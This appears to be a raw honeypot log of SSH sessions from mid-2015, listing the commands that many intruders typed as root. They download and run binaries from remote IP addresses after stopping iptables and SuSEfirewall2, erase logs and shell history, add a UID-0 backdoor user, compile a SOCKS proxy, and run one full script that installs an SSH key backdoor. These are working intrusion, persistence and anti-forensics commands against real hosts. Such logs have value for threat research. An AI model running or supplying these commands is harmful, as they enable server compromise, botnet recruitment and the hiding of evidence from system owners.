history
cd
cat /etc/redhat-release

From 107.150.45.147  8-Jun-2015 23:30:45 ssh2 root
Exec /root/disk
/root/disk

From 85.186.66.140  9-Jun-2015 08:28:21 ssh2 root
w
cat /proc/cpuinfo
cd /var/tmp
ls -a
perl
wget

From 219.151.8.155  9-Jun-2015 09:49:47 ssh2 root
netstat -an
uname -a
ifconfig
/etc/init.d/iptables stop
cd /usr/local/bin
wget http://14.29.49.34:9191/cups-lpd
history -c

From 85.186.66.140  9-Jun-2015 13:21:25 ssh2 root
uname -a
wget www.ilegale.altervista.org/lamech.tgz tar xzvf lamech.tgz cd .bashrc chmod
cd /tmp
ls -a
w

From 85.186.66.140  9-Jun-2015 18:14:29 ssh2 root
su -l
ls -a
uname -a
cat /proc/cpuinfo
passwd

From 219.151.8.155  9-Jun-2015 20:08:49 ssh2 root
rz -e
rz
re -z
te
history -c

From 78.97.71.160  9-Jun-2015 23:07:33 ssh2 root
w
passwd
ls -a
cd /tmp
wget angelfire.com/komales88/muh.tgz
tar zxvf muh.tgz
tar zxvf muh.jpg
rm -rf muh.tgz muh.jpg
cd lib
chmod +x *
ls -a

From 109.163.234.4 11-Jun-2015 04:25:57 ssh2 root
export HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
pwd
bash
sh
/bin/bash
locate bash
uname -a
unset HISTFILE=/dev/null HISTFILESIZE=0 HISTSIZE=0
cat /etc/paswd

From 108.61.220.135 11-Jun-2015 23:43:59 ssh2 root
Exec wget -c http://104.156.238.159/79&&chmod 777 79
wget -c http://104.156.238.159/79&&chmod 777 79

From 89.136.65.218 12-Jun-2015 09:44:21 ssh2 root
w
uname -a
ls -a

From 42.49.222.185 12-Jun-2015 10:03:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.244.151.123:1416/qq;chmod 777 qq;./qq;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.244.151.123:1416/qq
chmod 777 qq
./qq

From 79.112.192.156 12-Jun-2015 14:37:25 ssh2 root
uname -a
id
w
unset
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
w
exit

From 87.118.91.140 13-Jun-2015 00:23:33 ssh2 root
id
uptime
whoami
exit

From 94.185.83.2 13-Jun-2015 05:16:37 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=
w
ps -ef
df -h

From 216.170.125.155 13-Jun-2015 06:41:05 ssh2 root
Exec wget -c http://104.156.238.159/76&&chmod 777 76
wget -c http://104.156.238.159/76&&chmod 777 76

From 118.193.184.113 14-Jun-2015 00:48:53 ssh2 root
wget http://118.193.184.113:6688/2016facai chmod +x 2016facai ./2016facai chattr +i
ps -ef

From 172.245.96.111 14-Jun-2015 13:38:11 ssh2 root
Exec wget -c http://104.156.238.159/49&&chmod 777 49
wget -c http://104.156.238.159/49&&chmod 777 49

From 82.159.232.126 15-Jun-2015 06:07:17 ssh2 root
Exec ls -al
ls -al

From 87.234.16.114 17-Jun-2015 02:04:53 ssh2 root
w
ps x
ls
ls -alLF
cd .xauthFt555r
ls
wget joint.host.sk/muhlinux.tar
curl
wget
w
ftp
cd ..
ls
cat test.pl
ls
cd Mail
ls
ls -alLF
w
exit

From 140.75.228.193 17-Jun-2015 03:32:23 ssh2 root
uname -a
cd .ssh
ls
cat test.pl
ls -la test.pl
cd ..
ls -la
cd .ssh
ls -la
cd .ssh
ls -la
cd /sbin
wget http://222.186.34.91:6513/java
wget
wget -O http://222.186.34.91:6513/java
wget -c http://222.186.34.91:6513/java
history -c
su
history
exit

From 144.76.33.39 17-Jun-2015 06:57:57 ssh2 root
unset HISTFILE HISTSAVE
w
uname -a
cat /etc/passwd
cat /etc/issue
uname -
cat /etc/hosts
ls -al
cat ftp.openbsd.org
cd ftp.openbsd.org
ls -la
pwd
ls -la
cat .bash_history
cd ..
wget
ls -al
exit

From 221.238.22.8 17-Jun-2015 13:51:25 ssh2 root
netstat -tnp
cd /sbin
ls -la java
wget http://222.186.34.91:6513/java
history -c
exit

From 216.170.125.155 18-Jun-2015 00:10:27 ssh2 root
Exec wget -c http://104.156.238.159/59&&chmod 777 59
wget -c http://104.156.238.159/59&&chmod 777 59

From 93.34.226.103 18-Jun-2015 07:23:17 ssh2 root
w
wget
curl
ftp
lynx
wget ftp://sibmedinfo:sibmedinfo@89.31.114.110/cartier.tgz
wget -c
wget -O ftp://sibmedinfo:sibmedinfo@89.31.114.110/cartier.tg
w
uname -a
ftp
id
ps x
ls
ls -alLF
cat test1.pl
pico test1.pl
vi test1.pl
joe
pico
cat test.pl
kill -9 -1
killall -9 -1
halt
ps x

From 222.186.58.131 18-Jun-2015 10:29:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.131:8081/3560;chmod 755 3560;./3560;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.131:8081/3560
chmod 755 3560
./3560

From 222.186.58.131 18-Jun-2015 20:48:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.131:8081/3560;chmod 777 3560;./3560;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.131:8081/3560
chmod 777 3560
./3560

From 119.73.36.13 19-Jun-2015 07:48:37 ssh2 root
w
uname -a
yum
apt-get
perl
apt-get install perl
perl
ps x
cd /var/tmp
ls -a
nano test.pl
cat test.pltest.pl
cat test.pl
cat test1.pl
cat reglas.pl

From 119.73.36.13 19-Jun-2015 12:41:41 ssh2 root
w
cat /proc/cpuinfo
cat /etc/hsots
cat /etc/issue
cat /etc/hosts
ifconfig
ls -a
pwd
wget
df -h
ls
cat ipcalc.pl
nano
apt-get install nano
vi ipcalc.pl

From 5.9.137.39 19-Jun-2015 17:34:45 ssh2 root
ps x
ls -a
cd /var/tmp
vi
ls -a
cd /tmp
ls -a
wc -l test.pl
rm
rm -rf
rm -rf .Xresources
ls -a

From 5.14.0.213 19-Jun-2015 22:27:49 ssh2 root
w
uname -a
passwd
pwd
cd /var/tmp
ls -all
cd .Gabber-spool
ls -all
cd .xauth
ls -all
cd
ls -all

From 222.186.21.181 20-Jun-2015 13:07:01 ssh2 root
Exec killall -I -q .sshd gg ggu ggy
killall -I -q .sshd gg ggu ggy

From 222.186.21.181 20-Jun-2015 18:00:05 ssh2 root
Exec killall -I -q .sshd gg ggu ggy
killall -I -q .sshd gg ggu ggy
Exec killall -I -q .sshd gg ggu ggy
killall -I -q .sshd gg ggu ggy

From 85.186.66.140 20-Jun-2015 22:53:09 ssh2 root
w
cat /proc/cpuinfo

From 61.174.49.51 21-Jun-2015 00:23:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.174.49.51:10068/cc3600;chmod 777 cc3600;./cc3600;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://61.174.49.51:10068/cc3600
chmod 777 cc3600
./cc3600

From 122.236.240.217 21-Jun-2015 08:39:17 ssh2 root
ss
ls
cd
ss
curl http://112.124.65.90:23456/.ss -O /root/.ss
chmod 0777 /usr/bin/curl chmod 0777 /usr/bin/wget chmod 0777
wget http://112.124.65.90:23456/.ss
curl http://112.124.65.90:23456/.ss -O /root/.ss
uname -a

From 222.186.21.103 21-Jun-2015 10:42:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -chttp://222.186.21.103:10086/ddd1d;chmod 777 ddd1d;./ddd1d;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -chttp://222.186.21.103:10086/ddd1d
chmod 777 ddd1d
./ddd1d

From 222.186.21.103 21-Jun-2015 21:01:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.103:10086/ddd1b;chmod 777 ddd1b;./ddd1b;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.103:10086/ddd1b
chmod 777 ddd1b
./ddd1b

From 210.178.24.242 23-Jun-2015 03:58:51 ssh2 root
NETSTAT -TNP
netstat -tnp
cd /sbin
ls -la java
cat test.pl
history -c
exit

From 193.109.69.17 23-Jun-2015 14:17:53 ssh2 root
Exec BASH_HISTORY=/dev/null; HISTORY=/dev/null; history=/dev/null; HISTFILE=/dev/null; HISTFILESIZE=0; unset HISTFILE; unset SAVEHIST; echo '#!/bin/sh
PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null;
export PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null;
LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null;
export LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null;
BASH_HISTORY=/dev/null; HISTORY=/dev/null; history=/dev/null; HISTFILE=/dev/null; HISTFILESIZE=0; unset HISTFILE; unset SAVEHIST;
mkdir -p ~/.ssh;
if test -w ~/.ssh; then echo "START"; else chmod +w ~/.ssh; if test -w ~/.ssh; then echo "START"; else echo "-FAIL-: ~/.ssh not writable"; exit; fi; fi;
if test -s ~/.ssh/authorized_keys; then authorized_keys="authorized_keys"; else authorized_keys="authorized_keys2"; fi
if grep -q "`whoami`@`hostname`" ~/.ssh/$authorized_keys; then grep -v "`whoami`@`hostname`" ~/.ssh/$authorized_keys > ~/.ssh/.tmp; cat ~/.ssh/.tmp > ~/.ssh/$authorized_keys; rm -f ~/.ssh/.tmp; fi
if test -s ~/.ssh/id_dsa; then cat ~/.ssh/id_dsa > ~/.ssh/id_dsa.bkp; rm -f ~/.ssh/id_dsa; fi
if test -s ~/.ssh/id_dsa.pub; then cat ~/.ssh/id_dsa.pub > ~/.ssh/id_dsa.pub.bkp; rm -f ~/.ssh/id_dsa.pub; fi
pass="AncK9FWpRyT"; echo "Pass: $pass"; ssh-keygen -t dsa -N $pass -f ~/.ssh/id_dsa -q && cd ~/.ssh/ && cat id_dsa.pub >> $authorized_keys && cat id_dsa && rm -f id_dsa* && touch -r /etc/passwd $authorized_keys && touch -r /etc/passwd ~/.ssh && echo "+GOOD+";
if test -s ~/.ssh/id_dsa.bkp; then cat ~/.ssh/id_dsa.bkp > ~/.ssh/id_dsa; rm -f ~/.ssh/id_dsa.bkp; fi
if test -s ~/.ssh/id_dsa.pub.bkp; then cat ~/.ssh/id_dsa.pub.bkp > ~/.ssh/id_dsa.pub; rm -f ~/.ssh/id_dsa.pub.bkp; fi
' > _.sh;chmod +x _.sh;./_.sh;echo 275164698 > _.sh;rm -f _.sh;
BASH_HISTORY=/dev/null
HISTORY=/dev/null
history=/dev/null
HISTFILE=/dev/null
HISTFILESIZE=0
unset HISTFILE
unset SAVEHIST
echo '#!/bin/sh PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null
export PATH=$PATH:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin 2>/dev/null
LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null
export LC_ALL=C LC_COLLATE=C LC_CTYPE=C LANG=C LANGUAGE=C 2>/dev/null
BASH_HISTORY=/dev/null
HISTORY=/dev/null
history=/dev/null
HISTFILE=/dev/null
HISTFILESIZE=0
unset HISTFILE
unset SAVEHIST
mkdir -p ~/.ssh
if test -w ~/.ssh
then echo "START"
else chmod +w ~/.ssh
if test -w ~/.ssh
then echo "START"
else echo "-FAIL-: ~/.ssh not writable"
exit

From 61.174.49.51 23-Jun-2015 20:02:01 ssh2 root
wget http://www.baidu.com/tamx32 chomd 0755 tamx32 ./tamx32 &
/etc/init.d/iptables stop 
SuSEfirewall2 stop 
chmod 0755 /tmp/.sbaoz 
nohup /tmp/.sbaoz > /dev/null 2>&1
passwd baozi 
userdel
groupdel 10991 
ls -l .lbaozm 
uname -a 
whoami
netstat -ant
reboot
echo "cd /tmp">>/etc/rc.local echo

From 222.186.21.166 24-Jun-2015 05:02:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.166:4428/CCDP;chmod 777 CCDP;./CCDP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.166:4428/CCDP
chmod 777 CCDP
./CCDP

From 222.186.21.166 24-Jun-2015 09:55:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.156:3331/ULPM;chmod 777 ULPM;./ULPM;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.156:3331/ULPM
chmod 777 ULPM
./ULPM

From 61.174.49.51 24-Jun-2015 10:55:57 ssh2 root
wget -c http://183.60.233.169:8889/abwdd.t chomd 777 abwdd.t ./abwdd.t &
chomd 0777 abwdd.d ./abwdd.d &

From 222.186.21.166 24-Jun-2015 19:41:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.166:4429/NAAA;chmod 777 NAAA;./NAAA;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.166:4429/NAAA
chmod 777 NAAA
./NAAA

From 221.238.22.25 25-Jun-2015 07:34:01 ssh2 root
cd /sbin
wget http://222.186.34.91:6513/sqlrer
wget
scp

From 188.227.173.194 25-Jun-2015 10:20:37 ssh2 root
wget
curl
cat /pro cp
uname -a
ps -ax
cat /proc/cpuinfo
/sbin/ifcon
/sbin/ifconfig
perl
python
gcc
df -h
cd /usr/src
wget mineturk.com/skin/3proxy-0.6.1.tgz
tar zxpvf 3proxy-0.6.1.tgz
cd 3proxy-0.6.1/src
replace '1080' '20911' -- socks.c
cd ../ make -f Makefile.Linux
cd src
cp socks /usr/bin/
cd ../.. rm -rf 3proxy*
wget
cd /usr/src
ls -al
pwd
perl test.pl
cat test.pl
pwd
ls -al
pwd
cd ~
ls -al
cat test.pl
cat test1.pl
exit

From 85.25.43.214 25-Jun-2015 15:13:41 ssh2 root
Exec wget http://95.173.183.52/init.s -O /tmp/init.s ; chmod 777 /tmp/init.s ; /tmp/init.s &echo -n '167.114.3.141:' ; cat /tmp/.inits.pid; rm -rf /tmp/init.s
wget http://95.173.183.52/init.s -O /tmp/init.s
chmod 777 /tmp/init.s
/tmp/init.s &echo -n '167.114.3.141:'
cat /tmp/.inits.pid
rm -rf /tmp/init.s

From 188.138.9.49 26-Jun-2015 00:59:49 ssh2 root
w
set +o history
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
w
ls -a
cd /var/tmp ls -a
ls -a
cd /dev/shm ls -a
istory
history
uname -a
l s-a
history
cd /dev/shm s l-a
ls -a
pwd
wget kqs.xp3.biz/cacat/autopsy.tgz
wget
ftp
wget http://kqs.xp3.biz//cacat/autopsy.tgz
last
perl
python
apt-get install perl
perl

From 182.106.215.93 26-Jun-2015 04:12:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.145.198:8484/lian64;chmod 777 lian64;./lian64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.147.145.198:8484/lian64
chmod 777 lian64
./lian64

From 67.184.118.95 26-Jun-2015 05:52:53 ssh2 root
cat /proc/cpuinfo
cd /dev/smh ls -a
id
w
cat /etc/passwd

From 109.201.152.243 26-Jun-2015 10:45:57 ssh2 root
w'
w

From 182.106.215.93 26-Jun-2015 14:31:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.145.198:8484/DDos;chmod 777 DDos;./DDos;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.147.145.198:8484/DDos
chmod 777 DDos
./DDos

From 185.67.204.133 26-Jun-2015 15:39:01 ssh2 root
ls
history
last
ethtool eth0

From 23.234.41.180 27-Jun-2015 06:18:13 ssh2 root
Exec wget http://180.131.36.98:231/ok -O /tmp/test
wget http://180.131.36.98:231/ok -O /tmp/test

From 221.238.22.8 27-Jun-2015 11:09:11 ssh2 root
uname -a
cd /sbin
ifconfig
ethtool eth0
wget
wget http://222.186.34.91:6513/03618.log
scp
wget -c http://222.186.34.91:6513/03618.log
wget -O /sbin/03618.log http://222.186.34.91:6513/03618.log

From 178.7.98.248 27-Jun-2015 16:04:21 ssh2 root
w
uname -a
ps x
uname -a
last -10
ifconfig
cd /var/tmp
ls -a
wget http://bali.hacked.jp:40554/c.jpg
ls -a
uname -a
history -c
w
ps x
ifconfig

From 178.7.98.248 27-Jun-2015 20:57:25 ssh2 root
w
ps x
perl
yum install perl
apt-get install perl
wget http://bali.do.am/bali1
history -c
w
ps x
last -1
last
w
bwho
ps x
ls -a
cd
ls -a
nano test1.pl
vi

From 69.92.121.86 28-Jun-2015 01:50:29 ssh2 root
w
ps x
w
ps x
wget http://bali.do.am/bali1
curl -O http://bali.do.am/bali1
ls -a
apt-get install curl
apt-get install curl install curl curl install curl
curl -O http://bali.do.am/bali1
ls -a
ifcomfig

From 178.7.98.248 28-Jun-2015 06:43:33 ssh2 root
w
ps x
ifconfig
cd /home
ls -a
adduser owner
useradd
yum install update
yum
apt-get
apt-get install update
apt-get install update &&&
perl
apt-get install perl
perl
history -c
exit

From 39.82.126.58 28-Jun-2015 07:47:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.244.130.201:50/hhh;chmod 777 hhh;./zitao;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.244.130.201:50/hhh
chmod 777 hhh
./zitao

From 178.17.174.10 29-Jun-2015 21:48:05 ssh2 root
set +o history
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null w
id
uname -a
cd /dev/shm/.s
cat trueusers.txt
w
ls -a
wget kqs.xp3.biz/cacat/devil.jpg
tar xvf devil.jpg
perl tmp.txt
rm -rf devil.jpg
rm -rf tmp.txt
w
ls -a
pwd

From 195.254.134.234 30-Jun-2015 02:41:09 ssh2 root
unset HISTFILE HISTSIZE HISTSAVE
w
uname -a
ps aux
cat /etc/hosts

From 115.210.138.107 30-Jun-2015 11:22:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.112.166.151:8080/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.112.166.151:8080/xudp
chmod 777 xudp
./xudp

From 91.81.221.211 30-Jun-2015 17:20:21 ssh2 root
w
ls -all
ifconfig
cat /proc/cpuinfo
history
ps x
ps aux
wget
uname -a
cd /dev/shm
ls -a
ls
mkdir ::
mkdir all
history -c
apt-get install wget
history -c
w
wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz
apt-get install wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz
wget http://blackteam.altervista.org/blackteam/ICE-unix.tar.gz
history -c
ifconfig

From 61.174.49.51 30-Jun-2015 21:41:27 ssh2 root
service iptables stop /etc/init.d/iptables stop SuSEfirewall2 stop reSuSEfirewall2
chmod 777 RRR22 ./RRR22 &

From 94.216.52.226  1-Jul-2015 03:06:29 ssh2 root
w
uname -a
cat /proc/cpuinfo
history
ls -a
ps ux
cd /var/tmp
ls -a
cd " "
ls -a
perl perlbot.pl
cd /dev/shm
ls -a
perl perlbot.pl
cd " "
perl perlbot.pl
history -c -d offset

From 178.7.115.207  1-Jul-2015 12:52:37 ssh2 root
ifconfig
history -c -d offset

From 178.7.115.207  1-Jul-2015 17:45:41 ssh2 root
w
uname -a
cat /proc/cpuinfo
cd /dev/shm
ls -a
cd /var/tmp
ls -a
mkdir " "
cd /root
ls -a
cd /home
ls -a
cd /game
ls -a
cd /var/tmp
history
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

From 94.216.55.140  1-Jul-2015 22:38:45 ssh2 root
w
uname -a
cd /dev/shm
ls -a
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

From 109.197.81.174  2-Jul-2015 13:17:57 ssh2 root
w
ls
ls -all
ifconfig
cat /proc/cpuinfo
ls
nano reglas.pl
nano test.pl
ls
history -c
unset HISTFILE
unset HISTSAVE
unset REMOTEHOST
unset REMOTEUSER
unset HISTMOVE
unset USERHOST
history -n
unset WATCH
export HISTFILE=/dev/null
rm -rf .bash_history
rm -rf .bash_history rm -rf /var/run/utmp rm -rf
ls
w
rm -rf .bash_history rm -rf /var/run/utmp rm -rf
wget
yum install wget
apt-get install wget
wget
ls
nano
yum install nano

From 178.10.182.198  2-Jul-2015 18:11:01 ssh2 root
w
uname -a
cat /proc/cpuinfo
id
ifconfig
cd /var/tmp
ls -a
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

From 178.10.182.198  2-Jul-2015 23:04:05 ssh2 root
history
cat /etc/issue
ls -a

From 78.191.192.92  3-Jul-2015 01:16:37 ssh2 root
w
history
ls
cd /etc
ls
last

From 92.53.11.235  3-Jul-2015 03:57:09 ssh2 root
ps x
w
uname -a
wget
wget botsmk.at.ua/desireNET/desire.tgz

From 92.53.11.235  3-Jul-2015 08:50:13 ssh2 root
passwd
w
ps x

From 122.242.201.82  3-Jul-2015 11:35:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://61.7.151.106:8080/linux;chmod 777 linux;./linux;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://61.7.151.106:8080/linux
chmod 777 linux
./linux

From 18.58.0.191  3-Jul-2015 13:43:17 ssh2 root
w
uname -a
ps x
ls -a
ls

From 84.117.70.153  3-Jul-2015 18:36:21 ssh2 root
ls
cd ..
ls
cd ..
ls
cd /
ls
wget
wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz
wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate
wget http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate http://dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz --no-check-certificate --no-check-certificate
wget -c dracdevil.unet.cc/3WPaFRZmhRqg/psy.tgz
sudo -s
yum install sudo
wget
ls
cd vmware
ls
cat test.pl
pico test.pl

From 178.10.178.30  3-Jul-2015 23:29:25 ssh2 root
w
uname -a
cat /proc/cpuinfo
cat /etc/issue
ls -a
cd /dev/shm
ls -a
cd /var/tmp
ls -a
mkdir " "
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2ksp3.exe
history -c -d offset

From 46.217.64.255  4-Jul-2015 09:15:33 ssh2 root
w
ps x
wget http://bali.do.am/bali1
ls -a
history -c
exit

From 77.247.181.165  4-Jul-2015 23:54:45 ssh2 root
w
cat /proc/cpuinfo
ls -a

From 83.45.25.176  5-Jul-2015 04:47:49 ssh2 root
cat /proc/cpuinfo
cat /etc/issue
/sbin/ifconfig | grep inet -w -c
cat /etc/passwd
ps -x
uname -a
ls -la
nano .bash_history
vi .bash_history
vii .bash_history
sshd
cd /tmp
wget http://djsony.ucoz.com/ssd.jpg
c
wget http://djsony.ucoz.com/ssd.jpg
wget atack.altervista.org/psy.tar
cd /var/tmp
wget atack.altervista.org/psy.tar

From 83.45.25.176  5-Jul-2015 09:40:53 ssh2 root
ls -la
cd mc
ls
cd test.pl
ls
cd Mail
ls
nano Mali
vi Mail
last
yum
qurl
w

From 37.228.224.211  5-Jul-2015 14:33:57 ssh2 root
unset HISTFILE unset HISTSAVE unset SAVEFILE unset ********
w
ps x
uname -a
cat /etc/passwc
cat /etc/passwd
ls -la
sshd
wget http://fm.fo/images/cette.jpg
tar zxvf cette.jpg
rm -rf cette*
cd ssh
cat /etc/hosts
exit

From 46.101.205.242  5-Jul-2015 19:27:01 ssh2 root
w
ps -aux
uname -a
gcc
apt-get
apt-get install make
cat /etc/passwd
cat /etc/shadow
ls -la /home
pwd
cd /home
ls -sa
adduser apt-get install identd
apt-get install identd
ps -aux
apt-get install irssi
adduser C-5
useradd C-5
/root
cd /root
apt-get
adduser
useradd
apt-get install adduser
adduser
userdd
useradd
ifconfig -a
last
last -a
/bin/last
apt-get install binutils
ls
pwd
cat /etc/issue
cd bin
ls -sa
cd /bin
ls -sa
cd /usr/bin
ls -sa
pwd
dir -sa
dir
pstree
cd /root
wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
curl http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
exit

From 83.45.25.176  6-Jul-2015 00:20:05 ssh2 root
wget http://mia.artistas.ro/C-4.bscp

From 221.238.22.8  6-Jul-2015 01:29:51 ssh2 root
uname -a
cd /sbin
ls -la sqlrer
ls -la java
uptime
w
ifconfig
ethtool eth0
netstat -tnp
wget http://222.186.34.91:6513/Lwser.sh.x
history -c
exit

From 37.228.224.211  6-Jul-2015 05:13:09 ssh2 root
unset HISTFILE unset HISTSAVE unset SAVEFILE unset ********
w
sshd
ls -la
nano test.pl
vi test.pl
cat /proc/cpuinfo
locate vuln

From 37.228.224.211  6-Jul-2015 10:06:13 ssh2 root
cd /tmp
ls -la
cat .bash_history
cat /etc/passwd
cd /etc
ls
ls -la
cd ~
ls -la

From 37.228.224.211  6-Jul-2015 14:59:17 ssh2 root
/usr/sbin/useradd -o -u 0 -g root gnats

From 37.228.224.211  6-Jul-2015 19:52:21 ssh2 root
useradd mama
adduser
perl -v

From 37.228.224.211  7-Jul-2015 00:45:25 ssh2 root
yum
apt-get
apt-get install nano

From 37.228.224.211  7-Jul-2015 05:38:29 ssh2 root
apt-get install perl
perl -v

From 37.228.224.211  7-Jul-2015 10:31:33 ssh2 root
apt-get install perl*
apt-get update
apt-get upgrade

From 37.228.224.211  7-Jul-2015 15:24:37 ssh2 root
apt-get install perl
free -gt
mem
memo

From 37.228.224.211  7-Jul-2015 20:17:41 ssh2 root
netstat -autp
netstat -autp -autp
netstat -autp -autp -autp -autp -autpts -autp -autp
apt-get install wget
wget
perl -v
apt-get install openssl*
apt-get install perl*

From 37.228.224.211  8-Jul-2015 01:10:45 ssh2 root
apt-get install lib
apt-get install lib*
exit

From 124.236.70.212  8-Jul-2015 05:05:01 ssh2 root
w
wget http://115.239.248.46:8042/yn25

From 49.248.118.228  8-Jul-2015 06:03:49 ssh2 root
w
uname -a
dree -m
free -m
cat /etc/issue
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
history -c
exit

From 90.209.64.120  9-Jul-2015 01:36:05 ssh2 root
cd /tmp
wget martyn.net63.net/q
uname -a
perl

From 193.111.232.132  9-Jul-2015 11:22:13 ssh2 root
history -c -d offset
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
w
uname -a
cat /proc/cpuinfo
cat /etc/passwd
ls -a
cat /etc/passwd
id
cd /home
ls -a
/usr/sbin/useradd safe
cd |
cd ~
pwd
ls /a
cd /root
ls -a
cd /tmp
ls -a
/sbin/ifconfig | grep inet |wc -l
w

From 193.111.232.132  9-Jul-2015 16:15:17 ssh2 root
id
ls -a
pwd pico .bash_history

From 193.111.232.132  9-Jul-2015 21:08:21 ssh2 root
pico .bash_history
cd .ICE-unix
ls -a
pwd
ls
mkdir ,.
wget

From 112.114.15.13  9-Jul-2015 22:21:09 ssh2 root
uname -a
ps -e
ips -e

From 193.111.232.132 10-Jul-2015 02:01:25 ssh2 root
wget http://safe.home.ro/psy.jpg

From 193.111.232.132 10-Jul-2015 06:54:29 ssh2 root
wget -O http://safe.home.ro/psy.jpg
w
wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.21.tar.gz

From 193.111.232.132 10-Jul-2015 11:47:33 ssh2 root
curl -O
wget -O http://safe.home.ro/psy.jpg
history -c
vi .bash_history
cd /root
id
ps
ps a
history -c

From 193.111.232.132 10-Jul-2015 16:40:37 ssh2 root
history -c -d offset unset HISTFILE unset HISTSAVE
history -c -d offset
unset HISTFILE
